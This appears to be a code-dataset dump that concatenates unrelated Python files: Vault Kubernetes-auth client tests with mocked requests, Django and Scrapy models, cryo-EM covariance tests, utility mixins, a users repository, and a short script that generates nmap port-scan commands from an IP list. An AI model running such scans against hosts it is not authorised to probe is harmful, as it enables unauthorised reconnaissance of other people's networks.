"secret_id_num_uses": 0,
"secret_id_ttl": 0,
"token_max_ttl": 900,
"token_num_uses": 0,
"token_ttl": 600
},
"lease_duration": 0,
"lease_id": "",
"renewable": False,
"request_id": "0aab655f-ecd2-b3d4-3817-35b5bdfd3f28",
"warnings": None,
"wrap_info": None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/role/{1}'.format(
'kubernetes' if mount_point is None else mount_point,
role_name,
)
requests_mocker.register_uri(
method='GET',
url=mock_url,
status_code=expected_status_code,
json=mock_response,
)
client = Client()
test_arguments = dict(
name=role_name,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.get_kubernetes_role(**test_arguments)
self.assertEquals(
first=mock_response,
second=actual_response,
)
@parameterized.expand([
("default mount point", None, ['test-role-1', 'test-role-2']),
("custom mount point", "k8s", ['test-role']),
])
@requests_mock.Mocker()
def test_list_kubernetes_roles(self, test_label, mount_point, role_names, requests_mocker):
expected_status_code = 200
mock_response = {
"auth": None,
"data": {
"keys": role_names,
},
"lease_duration": 0,
"lease_id": "",
"renewable": False,
"request_id": "e4c219fb-0a78-2be2-8d3c-b3715dccb920",
"warnings": None,
"wrap_info": None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/role?list=true'.format(
'kubernetes' if mount_point is None else mount_point,
)
requests_mocker.register_uri(
method='GET',
url=mock_url,
status_code=expected_status_code,
json=mock_response,
)
client = Client()
test_arguments = dict()
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.list_kubernetes_roles(**test_arguments)
# ensure we received our mock response data back successfully
self.assertEqual(mock_response, actual_response)
@parameterized.expand([
("default mount point", None, "application1"),
("custom mount point", "k8s", "application2"),
])
@requests_mock.Mocker()
def test_delete_kubernetes_role(self, test_label, mount_point, role_name, requests_mocker):
expected_status_code = 204
mock_url = 'http://localhost:8200/v1/auth/{0}/role/{1}'.format(
'kubernetes' if mount_point is None else mount_point,
role_name,
)
requests_mocker.register_uri(
method='DELETE',
url=mock_url,
status_code=expected_status_code,
)
client = Client()
test_arguments = dict(
role=role_name,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.delete_kubernetes_role(**test_arguments)
self.assertEquals(
first=expected_status_code,
second=actual_response.status_code,
)
@parameterized.expand([
("default mount point", "custom_role", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", None),
("custom mount point", "custom_role", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "gcp-not-default")
])
@requests_mock.Mocker()
def test_auth_kubernetes(self, test_label, test_role, test_jwt, mount_point, requests_mocker):
mock_response = {
'auth': {
'accessor': 'accessor-1234-5678-9012-345678901234',
'client_token': 'cltoken-1234-5678-9012-345678901234',
'lease_duration': 10000,
'metadata': {
'role': 'custom_role',
'service_account_name': 'vault-auth',
'service_account_namespace': 'default',
'service_account_secret_name': 'vault-auth-token-pd21c',
'service_account_uid': 'aa9aa8ff-98d0-11e7-9bb7-0800276d99bf'
},
'policies': [
'default',
'custom_role'
],
'renewable': True
},
'data': None,
'lease_duration': 0,
'lease_id': '',
'renewable': False,
'request_id': 'requesti-1234-5678-9012-345678901234',
'warnings': [],
'wrap_info': None
}
mock_url = 'http://localhost:8200/v1/auth/{0}/login'.format(
'kubernetes' if mount_point is None else mount_point)
requests_mocker.register_uri(
method='POST',
url=mock_url,
json=mock_response
)
client = Client()
test_arguments = dict(
role=test_role,
jwt=test_jwt,
)
if mount_point:
test_arguments['mount_point'] = mount_point
actual_response = client.auth_kubernetes(**test_arguments)
# ensure we received our mock response data back successfully
self.assertEqual(mock_response, actual_response)
| 34.517123 | 147 | 0.571188 | 1,006 | 10,079 | 5.421471 | 0.157058 | 0.102677 | 0.049505 | 0.039787 | 0.761276 | 0.724789 | 0.693986 | 0.671617 | 0.648882 | 0.59571 | 0 | 0.039064 | 0.321857 | 10,079 | 291 | 148 | 34.635739 | 0.758888 | 0.020042 | 0 | 0.573077 | 0 | 0 | 0.2 | 0.040223 | 0 | 0 | 0 | 0 | 0.026923 | 1 | 0.026923 | false | 0 | 0.015385 | 0 | 0.046154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7856542a78848ad39b3fdf129fb9aed087356444 | 400 | py | Python | login/migrations/0002_auto_20200404_2123.py | bbsddn2020/django-user-LinHai-v1.0 | b4f1d4c38f9a98d850358eb0dfd93502a2d42907 | [
"MIT"
] | null | null | null | login/migrations/0002_auto_20200404_2123.py | bbsddn2020/django-user-LinHai-v1.0 | b4f1d4c38f9a98d850358eb0dfd93502a2d42907 | [
"MIT"
] | 8 | 2021-03-19T01:39:43.000Z | 2022-03-12T00:22:19.000Z | login/migrations/0002_auto_20200404_2123.py | bbsddn2020/django-user-LinHai-v1.0 | b4f1d4c38f9a98d850358eb0dfd93502a2d42907 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-04-04 13:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='c_time',
field=models.DateTimeField(auto_now_add=True, verbose_name='注册时间'),
),
]
| 21.052632 | 79 | 0.6 | 45 | 400 | 5.2 | 0.822222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065972 | 0.28 | 400 | 18 | 80 | 22.222222 | 0.746528 | 0.1125 | 0 | 0 | 1 | 0 | 0.087819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7859f91bde5be0e471228aaf20e69559dc908a81 | 2,484 | py | Python | script/util/MixIn.py | demetoir/MLtools | 8c42fcd4cc71728333d9c116ade639fe57d50d37 | [
"MIT"
] | null | null | null | script/util/MixIn.py | demetoir/MLtools | 8c42fcd4cc71728333d9c116ade639fe57d50d37 | [
"MIT"
] | null | null | null | script/util/MixIn.py | demetoir/MLtools | 8c42fcd4cc71728333d9c116ade639fe57d50d37 | [
"MIT"
] | null | null | null | from multiprocessing.pool import Pool
from script.util.Logger import Logger
from script.util.misc_util import dump_pickle, load_pickle, dump_json, load_json
class LoggerMixIn:
def __init__(self, verbose=0):
self.verbose = verbose
@property
def log(self):
level = Logger.verbose_to_level(self.verbose)
return Logger(self.__class__.__name__, level=level)
class PickleSelfMixIn:
def dump(self, path):
dump_pickle(self, path)
def load(self, path):
load_obj = load_pickle(path)
if load_obj.__class__ is not self.__class__:
raise TypeError(f"load obj is not {load_obj.__class__} is not match with expected class {self.__class__}")
new_obj = self.__class__()
for key, items in load_obj.__dict__.items():
setattr(new_obj, key, items)
return new_obj
def to_pickle(self, path, **kwargs):
dump_pickle(self, path)
def from_pickle(self, path, overwrite_self=False, **kwargs):
load_obj = load_pickle(path)
# for auto detect pickle type
if load_obj.__class__ is not self.__class__:
raise TypeError(f"load obj is not {load_obj.__class__} is not match with expected class {self.__class__}")
new_obj = self.__class__()
for key, items in load_obj.__dict__.items():
setattr(new_obj, key, items)
if overwrite_self:
for key, val in new_obj.__dict__.items():
self.__dict__[key] = val
return new_obj
class PickleMixIn:
@staticmethod
def to_pickle(obj, path):
dump_pickle(obj, path)
@staticmethod
def from_pickle(path):
return load_pickle(path)
class JsonMixIn:
@staticmethod
def _dump_json(obj, path):
dump_json(obj, path)
@staticmethod
def _load_json(path):
return load_json(path)
def from_json(self, path):
return self._load_json(path)
def to_json(self, obj, path):
self._dump_json(obj, path)
class singletonPoolMixIn:
_pool_singleton = None
_n_job = None
def __init__(self, n_job=1):
self.__class__._n_job = n_job
@property
def pool(self):
if self.__class__._pool_singleton is None:
self.__class__._pool_singleton = Pool(
processes=self.__class__._n_job)
return self.__class__._pool_singleton
| 27.910112 | 119 | 0.629227 | 317 | 2,484 | 4.444795 | 0.192429 | 0.07665 | 0.039745 | 0.039745 | 0.298084 | 0.238467 | 0.238467 | 0.238467 | 0.238467 | 0.238467 | 0 | 0.001129 | 0.287037 | 2,484 | 88 | 120 | 28.227273 | 0.794466 | 0.01087 | 0 | 0.349206 | 0 | 0 | 0.072666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.047619 | 0.047619 | 0.492063 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
78631bb24e50a8426b5da59ee2705af3b943ad83 | 361 | py | Python | exceptions.py | udartsev/django-geodata | 945cac06dd8010733225f7adb0536443cc5ebac6 | [
"MIT"
] | null | null | null | exceptions.py | udartsev/django-geodata | 945cac06dd8010733225f7adb0536443cc5ebac6 | [
"MIT"
] | null | null | null | exceptions.py | udartsev/django-geodata | 945cac06dd8010733225f7adb0536443cc5ebac6 | [
"MIT"
] | null | null | null | class BaseServerException(Exception):
def __init__(self, detail, status_code, message):
super().__init__(message)
self.detail = detail
self.status_code = status_code
class SearchFieldRequiered(BaseServerException):
def __init__(self):
super().__init__(detail='entity', status_code=404, message='Search field required')
| 32.818182 | 91 | 0.714681 | 38 | 361 | 6.263158 | 0.447368 | 0.168067 | 0.092437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010135 | 0.180055 | 361 | 10 | 92 | 36.1 | 0.793919 | 0 | 0 | 0 | 0 | 0 | 0.074792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7864fa9e3feb65d8c57f4031a9b8d6c91a5790ce | 269 | py | Python | stackoverflow/spiders/items.py | Janeho454199/stackoverflow-spider | 6d60fc2d19d22cfeccdb8bca4aa144f3b633850c | [
"MIT"
] | 131 | 2018-03-17T14:59:47.000Z | 2022-03-23T02:36:56.000Z | stackoverflow/spiders/items.py | Janeho454199/stackoverflow-spider | 6d60fc2d19d22cfeccdb8bca4aa144f3b633850c | [
"MIT"
] | 18 | 2019-02-13T09:15:25.000Z | 2021-12-09T21:32:13.000Z | stackoverflow/spiders/items.py | Janeho454199/stackoverflow-spider | 6d60fc2d19d22cfeccdb8bca4aa144f3b633850c | [
"MIT"
] | 54 | 2018-03-25T03:30:34.000Z | 2022-03-23T02:36:58.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import scrapy
class StackoverflowItem(scrapy.Item):
links = scrapy.Field()
views = scrapy.Field()
votes = scrapy.Field()
answers = scrapy.Field()
tags = scrapy.Field()
questions = scrapy.Field()
| 17.933333 | 37 | 0.63197 | 31 | 269 | 5.483871 | 0.612903 | 0.388235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004717 | 0.211896 | 269 | 14 | 38 | 19.214286 | 0.79717 | 0.156134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
786a7c8d7a83b054334be66c769984509fe218e8 | 9,774 | py | Python | tests/test_covar.py | ComputationalCryoEM/ASPIRE | 6e6699eae532874de44b98adb7ddb2ad96c43d9d | [
"MIT"
] | null | null | null | tests/test_covar.py | ComputationalCryoEM/ASPIRE | 6e6699eae532874de44b98adb7ddb2ad96c43d9d | [
"MIT"
] | 5 | 2019-06-07T13:25:29.000Z | 2019-06-18T20:34:37.000Z | tests/test_covar.py | computationalcryoem/aspyre | 6e6699eae532874de44b98adb7ddb2ad96c43d9d | [
"MIT"
] | 1 | 2019-06-18T17:41:52.000Z | 2019-06-18T17:41:52.000Z | import os
import numpy as np
from scipy.cluster.vq import kmeans2
from unittest import TestCase
from unittest.mock import patch
import pytest
from aspyre.source import SourceFilter
from aspyre.source.simulation import Simulation
from aspyre.basis.fb_3d import FBBasis3D
from aspyre.imaging.filters import RadialCTFFilter
from aspyre.estimation.mean import MeanEstimator
from aspyre.estimation.covar import CovarianceEstimator
from aspyre.utils.matrix import eigs
from aspyre.utils.misc import src_wiener_coords
from aspyre.utils.matlab_compat import Random
import os.path
DATA_DIR = os.path.join(os.path.dirname(__file__), 'saved_test_data')
class CovarianceTestCase(TestCase):
@classmethod
def setUpClass(cls):
cls.sim = Simulation(
n=1024,
filters=SourceFilter(
[RadialCTFFilter(defocus=d) for d in np.linspace(1.5e4, 2.5e4, 7)],
n=1024
)
)
basis = FBBasis3D((8, 8, 8))
cls.noise_variance = 0.0030762743633643615
cls.mean_estimator = MeanEstimator(cls.sim, basis)
cls.mean_est = np.load(os.path.join(DATA_DIR, 'mean_8_8_8.npy'))
# Passing in a mean_kernel argument to the following constructor speeds up some calculations
cls.covar_estimator = CovarianceEstimator(cls.sim, basis, mean_kernel=cls.mean_estimator.kernel, preconditioner='none')
cls.covar_estimator_with_preconditioner = CovarianceEstimator(cls.sim, basis, mean_kernel=cls.mean_estimator.kernel, preconditioner='circulant')
def tearDown(self):
pass
@pytest.mark.expensive
def testCovariance(self):
covar_est = self.covar_estimator_with_preconditioner.estimate(self.mean_est, self.noise_variance)
self.assertTrue(np.allclose(
np.array([
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -4.97200141e-17, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, -1.12423131e-02, -7.82940670e-03, -5.25730644e-02, -5.12982911e-02, 5.46448594e-03, 0.00000000e+00],
[0.00000000e+00, -1.45263802e-02, 1.74773651e-02, 2.37465013e-02, -5.82802387e-02, -2.18693634e-02, -8.17610441e-03, -5.34913194e-02],
[0.00000000e+00, -1.25388002e-02, 3.32579746e-02, -2.47232520e-02, -1.45779671e-01, -9.90902473e-02, -1.21664500e-01, -1.86567008e-01],
[5.23168570e-17, 1.48361175e-02, 6.39768940e-02, 2.31061220e-01, 1.14505159e-01, -1.27282900e-01, -1.20426781e-01, -9.83754536e-02],
[0.00000000e+00, -2.77886166e-02, -2.70706646e-02, 3.27305040e-01, 3.52852148e-01, 1.95510582e-03, -5.53571860e-02, -2.08399248e-02],
[0.00000000e+00, -2.60699879e-02, -1.84686293e-02, 1.30268283e-01, 1.36522253e-01, 8.11090183e-02, 3.50443711e-02, -1.21283276e-02],
[0.00000000e+00, 0.00000000e+00, 6.67517637e-02, 1.12721933e-01, -8.87693429e-03, 2.99613531e-02, 4.14024319e-02, 0.00000000e+00]
]),
covar_est[:, :, 4, 4, 4, 4],
atol=1e-4
))
@patch('scipy.sparse.linalg.cg')
def testCovariance1(self, cg):
cg_return_value = np.load(os.path.join(DATA_DIR, 'cg_return_value.npy'))
cg.return_value = cg_return_value, 0 # 0 = convergence success
covar_est = self.covar_estimator.estimate(self.mean_est, self.noise_variance)
# Since we're only mocking a linear system solver, ensure that we did return the solution
# for the argument we got called with.
# 'call_args' is a tuple with the first member being the ordered arguments of the Mock call
# In our case (in order) - the LinearOperator and 'b' (the RHS of the linear system)
op, b = cg.call_args[0]
self.assertTrue(np.allclose(b, op(cg_return_value), atol=1e-5))
self.assertTrue(np.allclose(
np.array([
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -4.97200141e-17, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, -1.12423131e-02, -7.82940670e-03, -5.25730644e-02, -5.12982911e-02, 5.46448594e-03, 0.00000000e+00],
[0.00000000e+00, -1.45263802e-02, 1.74773651e-02, 2.37465013e-02, -5.82802387e-02, -2.18693634e-02, -8.17610441e-03, -5.34913194e-02],
[0.00000000e+00, -1.25388002e-02, 3.32579746e-02, -2.47232520e-02, -1.45779671e-01, -9.90902473e-02, -1.21664500e-01, -1.86567008e-01],
[5.23168570e-17, 1.48361175e-02, 6.39768940e-02, 2.31061220e-01, 1.14505159e-01, -1.27282900e-01, -1.20426781e-01, -9.83754536e-02],
[0.00000000e+00, -2.77886166e-02, -2.70706646e-02, 3.27305040e-01, 3.52852148e-01, 1.95510582e-03, -5.53571860e-02, -2.08399248e-02],
[0.00000000e+00, -2.60699879e-02, -1.84686293e-02, 1.30268283e-01, 1.36522253e-01, 8.11090183e-02, 3.50443711e-02, -1.21283276e-02],
[0.00000000e+00, 0.00000000e+00, 6.67517637e-02, 1.12721933e-01, -8.87693429e-03, 2.99613531e-02, 4.14024319e-02, 0.00000000e+00]
]),
covar_est[:, :, 4, 4, 4, 4],
atol=1e-4
))
@patch('scipy.sparse.linalg.cg')
def testCovariance2(self, cg):
# Essentially the same as above, except that our estimator now has a preconditioner
cg_return_value = np.load(os.path.join(DATA_DIR, 'cg_return_value.npy'))
cg.return_value = cg_return_value, 0 # 0 = convergence success
covar_est = self.covar_estimator_with_preconditioner.estimate(self.mean_est, self.noise_variance)
self.assertTrue(np.allclose(
np.array([
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -4.97200141e-17, 0.00000000e+00, 0.00000000e+00, 0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, -1.12423131e-02, -7.82940670e-03, -5.25730644e-02, -5.12982911e-02, 5.46448594e-03, 0.00000000e+00],
[0.00000000e+00, -1.45263802e-02, 1.74773651e-02, 2.37465013e-02, -5.82802387e-02, -2.18693634e-02, -8.17610441e-03, -5.34913194e-02],
[0.00000000e+00, -1.25388002e-02, 3.32579746e-02, -2.47232520e-02, -1.45779671e-01, -9.90902473e-02, -1.21664500e-01, -1.86567008e-01],
[5.23168570e-17, 1.48361175e-02, 6.39768940e-02, 2.31061220e-01, 1.14505159e-01, -1.27282900e-01, -1.20426781e-01, -9.83754536e-02],
[0.00000000e+00, -2.77886166e-02, -2.70706646e-02, 3.27305040e-01, 3.52852148e-01, 1.95510582e-03, -5.53571860e-02, -2.08399248e-02],
[0.00000000e+00, -2.60699879e-02, -1.84686293e-02, 1.30268283e-01, 1.36522253e-01, 8.11090183e-02, 3.50443711e-02, -1.21283276e-02],
[0.00000000e+00, 0.00000000e+00, 6.67517637e-02, 1.12721933e-01, -8.87693429e-03, 2.99613531e-02, 4.14024319e-02, 0.00000000e+00]
]),
covar_est[:, :, 4, 4, 4, 4],
atol=1e-4
))
def testMeanEvaluation(self):
metrics = self.sim.eval_mean(self.mean_est)
self.assertAlmostEqual(2.6641160559507631, metrics['err'], places=4)
self.assertAlmostEqual(0.17659437048516261, metrics['rel_err'], places=4)
self.assertAlmostEqual(0.9849211540734224, metrics['corr'], places=4)
def testCovarEvaluation(self):
covar_est = np.load(os.path.join(DATA_DIR, 'covar_8_8_8_8_8_8.npy'))
metrics = self.sim.eval_covar(covar_est)
self.assertAlmostEqual(13.322721549011165, metrics['err'], places=4)
self.assertAlmostEqual(0.59589360739385577, metrics['rel_err'], places=4)
self.assertAlmostEqual(0.84053472877416313, metrics['corr'], places=4)
def testEigsEvaluation(self):
covar_est = np.load(os.path.join(DATA_DIR, 'covar_8_8_8_8_8_8.npy'))
eigs_est, lambdas_est = eigs(covar_est, 16)
# No. of distinct volumes
C = 2
# Eigenvalues and their corresponding eigenvectors are returned in descending order
# We take the highest C-1 entries, since C-1 is the rank of the population covariance matrix.
eigs_est_trunc = eigs_est[:, :, :, :C-1]
lambdas_est_trunc = lambdas_est[:C-1, :C-1]
metrics = self.sim.eval_eigs(eigs_est_trunc, lambdas_est_trunc)
self.assertAlmostEqual(13.09420492368651, metrics['err'], places=4)
self.assertAlmostEqual(0.58567250265489856, metrics['rel_err'], places=4)
self.assertAlmostEqual(0.85473300555263432, metrics['corr'], places=4)
def testClustering(self):
covar_est = np.load(os.path.join(DATA_DIR, 'covar_8_8_8_8_8_8.npy'))
eigs_est, lambdas_est = eigs(covar_est, 16)
C = 2
eigs_est_trunc = eigs_est[:, :, :, :C-1]
lambdas_est_trunc = lambdas_est[:C-1, :C-1]
# Estimate the coordinates in the eigenbasis. Given the images, we find the coordinates in the basis that
# minimize the mean squared error, given the (estimated) covariances of the volumes and the noise process.
coords_est = src_wiener_coords(self.sim, self.mean_est, eigs_est_trunc, lambdas_est_trunc, self.noise_variance)
# Cluster the coordinates using k-means. Again, we know how many volumes we expect, so we can use this parameter
# here. Typically, one would take the number of clusters to be one plus the number of eigenvectors extracted.
# Since kmeans2 relies on randomness for initialization, important to push random seed to context manager here.
with Random(0):
centers, vol_idx = kmeans2(coords_est.T, C)
clustering_accuracy = self.sim.eval_clustering(vol_idx)
self.assertEqual(clustering_accuracy, 1)
| 57.83432 | 152 | 0.661756 | 1,403 | 9,774 | 4.513899 | 0.213115 | 0.080531 | 0.096637 | 0.055424 | 0.597031 | 0.587084 | 0.587084 | 0.553134 | 0.529133 | 0.529133 | 0 | 0.307514 | 0.206159 | 9,774 | 168 | 153 | 58.178571 | 0.5087 | 0.1283 | 0 | 0.491935 | 0 | 0 | 0.026932 | 0.012584 | 0 | 0 | 0 | 0 | 0.112903 | 1 | 0.072581 | false | 0.008065 | 0.129032 | 0 | 0.209677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7870afd916a5ff1b2cfabce4e171321789b079fb | 820 | py | Python | preference/models.py | ASL-19/outline-distribution | 6ef595d59c0d7d9416cd1d3c0fb263ba83830126 | [
"Apache-2.0"
] | 5 | 2020-12-21T21:19:28.000Z | 2022-03-28T00:53:45.000Z | preference/models.py | ASL-19/outline-distribution | 6ef595d59c0d7d9416cd1d3c0fb263ba83830126 | [
"Apache-2.0"
] | 5 | 2021-01-07T02:32:47.000Z | 2022-03-28T14:28:52.000Z | preference/models.py | ASL-19/outline-distribution | 6ef595d59c0d7d9416cd1d3c0fb263ba83830126 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 ASL19 Organization
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.db import models
class Region(models.Model):
"""
Class to store different Regions for
landing page
"""
name = models.CharField(
max_length=128)
def __str__(self):
return self.name
| 27.333333 | 74 | 0.72439 | 119 | 820 | 4.94958 | 0.714286 | 0.101868 | 0.044143 | 0.054329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019969 | 0.206098 | 820 | 29 | 75 | 28.275862 | 0.884793 | 0.739024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
78730c4c34562140b4aa13d567d8e6bd4a0cbb65 | 784 | py | Python | deprecated/ipport-list-to-script-nmap-portgroup-cmds.py | NullByte8080/ipport | fedee1ab956d8d0327b3572c67ebc5b945419aae | [
"MIT"
] | 10 | 2016-11-24T17:36:10.000Z | 2022-02-22T03:06:16.000Z | deprecated/ipport-list-to-script-nmap-portgroup-cmds.py | NullByte8080/ipport | fedee1ab956d8d0327b3572c67ebc5b945419aae | [
"MIT"
] | null | null | null | deprecated/ipport-list-to-script-nmap-portgroup-cmds.py | NullByte8080/ipport | fedee1ab956d8d0327b3572c67ebc5b945419aae | [
"MIT"
] | 4 | 2017-09-07T03:11:12.000Z | 2020-10-17T17:55:18.000Z | #!/usr/bin/env python
'''
convert ip port list nmap commands sorrounded in script statements
'''
import sys,re
if len(sys.argv) > 1:
filename = sys.argv[1]
else:
sys.stderr.write('Usage: '+sys.argv[0]+' <in-file>\n')
sys.exit(1)
ips = []
ports = dict()
for ip,port in map(lambda x: x.split(), filter(lambda x: re.match(r'^([0-9\.]+)\s*([0-9]+)$',x) != None, open(filename).read().strip().split('\n'))):
if ip not in ips:
ips += [ip]
if ip not in ports.keys():
ports[ip] = []
ports[ip] += [port]
for ip in ips:
#screen = 'screen -d -m -S '+ip+'-nmap-tcp-discovered '
print 'script -f -c \'nmap -Pn -vv -A -sS --version-all -p'+','.join(ports[ip])+' -oA '+ip+'-nmap-tcp-discovered '+ip+'\' '+ip+'-nmap-tcp-discovered.log'
# ^ -sS / -sT
| 31.36 | 154 | 0.570153 | 130 | 784 | 3.438462 | 0.523077 | 0.040268 | 0.060403 | 0.127517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012559 | 0.1875 | 784 | 24 | 155 | 32.666667 | 0.689168 | 0.153061 | 0 | 0 | 0 | 0 | 0.18569 | 0.080068 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7878dfadb37ab9ac5e636612f7783f3e1751ae64 | 3,370 | py | Python | app/db/repositories/user.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | 1 | 2021-11-18T16:25:22.000Z | 2021-11-18T16:25:22.000Z | app/db/repositories/user.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | app/db/repositories/user.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | from datetime import datetime
from uuid import uuid4
from typing import (
ClassVar,
TypeVar,
Union
)
from sqlalchemy import update as sa_update
from sqlalchemy.future import select as sa_select
from sqlalchemy.sql.elements import BinaryExpression
from .base import BaseRepository
from .types_ import ModelType
from ..errors import (
EmailInUpdateIsAlreadyTakenError,
EntityDoesNotExistError
)
from ..models import User
from ...schemas.entities.user import UserInUpdate
from ...services.security import UserPasswordService
__all__ = ['UsersRepository']
# actually, where statement emits <BinaryExpression>, but linter supposes comparing result as bool
WhereStatement = TypeVar('WhereStatement', bound=Union[BinaryExpression, bool])
class UsersRepository(BaseRepository):
model: ClassVar[ModelType] = User
async def update_by_email(self, email: str, user_in_update: UserInUpdate) -> User:
update_data = self._exclude_unset_from_schema(user_in_update)
if 'email' in update_data:
if await self.check_email_is_taken(update_data['email']):
raise EmailInUpdateIsAlreadyTakenError
update_data.update(self._get_update_data_on_email_update())
if 'password' in update_data:
update_data.update(self._get_update_data_on_password_update(update_data['password']))
stmt = sa_update(User).where(User.email == email).values(**update_data)
return await self._return_from_statement(stmt)
@staticmethod
def _get_update_data_on_email_update() -> dict:
return {
'is_email_confirmed': False,
'email_confirmed_at': None,
'email_confirmation_link': uuid4()
}
@staticmethod
def _get_update_data_on_password_update(password: str) -> dict:
user = UserPasswordService(User()).change_password(password)
return {
'hashed_password': user.hashed_password,
'password_salt': user.password_salt
}
async def confirm_by_email(self, email: str) -> User:
return await self._confirm_by_where_statement(User.email == email)
async def confirm_by_link(self, link: str) -> User:
return await self._confirm_by_where_statement(User.email_confirmation_link == link)
async def _confirm_by_where_statement(self, where_statement: WhereStatement) -> User:
update_data = self._get_update_data_on_email_confirmation()
stmt = sa_update(User).where(where_statement).values(**update_data)
return await self._return_from_statement(stmt)
@staticmethod
def _get_update_data_on_email_confirmation() -> dict:
return {
'is_email_confirmed': True,
'email_confirmed_at': datetime.utcnow()
}
async def fetch_by_email(self, email: str) -> User:
stmt = sa_select(User).where(User.email == email)
return await self._fetch_entity(stmt)
async def fetch_by_id(self, id_: int) -> ModelType:
stmt = (
sa_select(self.model)
.where(self.model.id == id_)
)
return await self._fetch_entity(stmt)
async def check_email_is_taken(self, email: str) -> bool:
try:
_ = await self.fetch_by_email(email)
except EntityDoesNotExistError:
return False
else:
return True
